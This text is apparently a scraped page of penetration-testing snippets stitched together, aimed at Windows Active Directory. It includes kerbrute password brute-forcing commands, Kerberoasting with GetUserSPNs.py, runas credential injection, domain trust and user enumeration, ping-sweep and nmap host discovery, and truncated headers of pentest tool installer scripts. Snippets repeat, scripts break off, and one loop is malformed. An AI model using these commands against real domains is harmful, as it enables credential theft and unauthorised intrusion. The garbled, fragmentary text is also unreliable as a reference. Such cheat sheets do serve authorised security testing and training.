With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/bin/bash | |
#LAST UPDATE: 30/03/2020 | |
#LAS CHANGE: added pkg-config. | |
RED='\033[0;31m' | |
GRN='\033[0;32m' | |
YLL='\033[1;33m' | |
NC='\033[0m' # No Color | |
#FILE NAMES | |
PTROOTDIR="pentestTools" | |
PTDIRS="{lists,tools,shells/{klbuiltin,}}" |
Note: I did not author this, i found it somehwere.
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
#!/bin/bash | |
##### (Cosmetic) Colour output | |
RED="\033[01;31m" # Issues/Errors | |
GREEN="\033[01;32m" # Success | |
YELLOW="\033[01;33m" # Warnings/Information | |
BLUE="\033[01;34m" # Heading | |
BOLD="\033[01;01m" # Highlight | |
RESET="\033[00m" # Normal |
#!/bin/bash | |
##### (Cosmetic) Colour output | |
RED="\033[01;31m" # Issues/Errors | |
GREEN="\033[01;32m" # Success | |
YELLOW="\033[01;33m" # Warnings/Information | |
BLUE="\033[01;34m" # Heading | |
BOLD="\033[01;01m" # Highlight | |
RESET="\033[00m" # Normal | |
echo -e "${GREEN}" | |
##################################installation starts ###################################### |
=======================HOST DISCOVERY=========================================== | |
Host discovery con PING: | |
$ for octect in (seq 0 254) | |
echo "Pinging [X.X.X.$octect]" | |
ping -c 2 10.150.150.$octect | grep "bytes from" | awk '{print $4}' | uniq -d | cut -d ":" -f 1 | tee -a targets.list | |
end | |
Host discovery con NMAP IMCP o ARP | |
$sudo nmap -vv -sn -PE 10.150.150.0/24 -oG HOSTDISCOVERY_ICMP.gnmap |
======================================================================================================================== | |
Kerberos Attacks | |
======================================================================================================================== | |
[+] Kerbose attack | |
./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin |
# Enumeration | |
# Credential Injection | |
runas.exe /netonly /user:<domain>\<username> cmd.exe | |
# enumeration users | |
users | |
net user /domain |